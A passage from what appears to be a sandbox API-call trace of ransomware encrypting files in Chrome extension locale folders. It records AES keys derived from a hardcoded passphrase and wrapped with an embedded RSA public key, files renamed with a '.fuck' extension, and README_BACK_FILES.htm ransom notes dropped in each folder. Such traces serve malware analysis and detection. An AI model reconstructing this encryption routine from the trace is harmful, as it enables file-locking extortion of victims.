Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c780) returned 1 [0258.939] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.939] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.939] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7bdf8) returned 1 [0258.939] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7bdf8, dwCertEncodingType=0x1, pInfo=0x2e25e00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25e30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25e38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c3c0) returned 1 [0258.939] CryptEncrypt (in: hKey=0x2e7c3c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.940] CryptEncrypt (in: hKey=0x2e7c3c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7b600*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e7b600*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.940] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e7b600*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e7b600*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.941] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x297, lpOverlapped=0x0) returned 1 [0258.942] CryptEncrypt (in: hKey=0x2e7c780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x297, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2a0) returned 1 [0258.942] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2a0, lpOverlapped=0x0) returned 1 [0258.950] CloseHandle (hObject=0x5d60) returned 1 [0258.950] CloseHandle (hObject=0x5d5c) returned 1 [0258.950] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json"), bFailIfExists=0) returned 1 [0258.953] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json", dwFileAttributes=0x0) returned 1 [0258.953] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.gsg")) returned 1 [0258.954] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.fuck")) returned 1 [0258.955] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0258.955] CryptDestroyKey (hKey=0x2e7c780) returned 1 [0258.955] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0258.955] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.955] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0258.955] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\readme_back_files.htm")) returned 0xffffffff [0258.955] AreFileApisANSI () returned 1 [0258.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0258.955] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0258.956] GetFileType (hFile=0x5d64) returned 0x1 [0258.956] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.957] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.957] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0258.958] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.958] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.958] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.958] GetLastError () returned 0x0 [0258.958] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json")) returned 0x20 [0258.959] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json", dwFileAttributes=0x80) returned 1 [0258.959] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.960] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.960] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.960] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0258.962] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.962] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0258.962] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.962] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c280) returned 1 [0258.962] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.962] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.962] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7c018) returned 1 [0258.963] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7c018, dwCertEncodingType=0x1, pInfo=0x2e26e40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26e70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26e78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c300) returned 1 [0258.963] CryptEncrypt (in: hKey=0x2e7c300, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.963] CryptEncrypt (in: hKey=0x2e7c300, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6c2b0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6c2b0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.963] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6c2b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6c2b0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.964] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x282, lpOverlapped=0x0) returned 1 [0258.965] CryptEncrypt (in: hKey=0x2e7c280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x282, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x290) returned 1 [0258.965] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x290, lpOverlapped=0x0) returned 1 [0258.976] CloseHandle (hObject=0x5d5c) returned 1 [0258.976] CloseHandle (hObject=0x5d60) returned 1 [0258.977] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json"), bFailIfExists=0) returned 1 [0258.982] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json", dwFileAttributes=0x0) returned 1 [0258.983] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.gsg")) returned 1 [0258.984] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.fuck")) returned 1 [0258.985] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0258.985] CryptDestroyKey (hKey=0x2e7c280) returned 1 [0258.985] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0258.985] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.985] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0258.985] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\readme_back_files.htm")) returned 0xffffffff [0258.985] AreFileApisANSI () returned 1 [0258.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3508, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0258.985] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0258.986] GetFileType (hFile=0x5d64) returned 0x1 [0258.986] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.988] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.988] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0258.989] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.989] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.989] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.989] GetLastError () returned 0x0 [0258.989] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json")) returned 0x20 [0258.989] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json", dwFileAttributes=0x80) returned 1 [0258.990] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.990] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.991] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.992] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0258.994] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.994] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0258.994] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.994] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c380) returned 1 [0258.994] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.994] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.994] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6cee8) returned 1 [0258.994] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6cee8, dwCertEncodingType=0x1, pInfo=0x2e25ed0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25f00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25f08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c180) returned 1 [0258.994] CryptEncrypt (in: hKey=0x2e7c180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.995] CryptEncrypt (in: hKey=0x2e7c180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6cbb8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6cbb8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.995] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6cbb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6cbb8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.996] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x2bd, lpOverlapped=0x0) returned 1 [0258.998] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2bd, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2c0) returned 1 [0258.998] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2c0, lpOverlapped=0x0) returned 1 [0258.999] CloseHandle (hObject=0x5d60) returned 1 [0258.999] CloseHandle (hObject=0x5d5c) returned 1 [0258.999] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 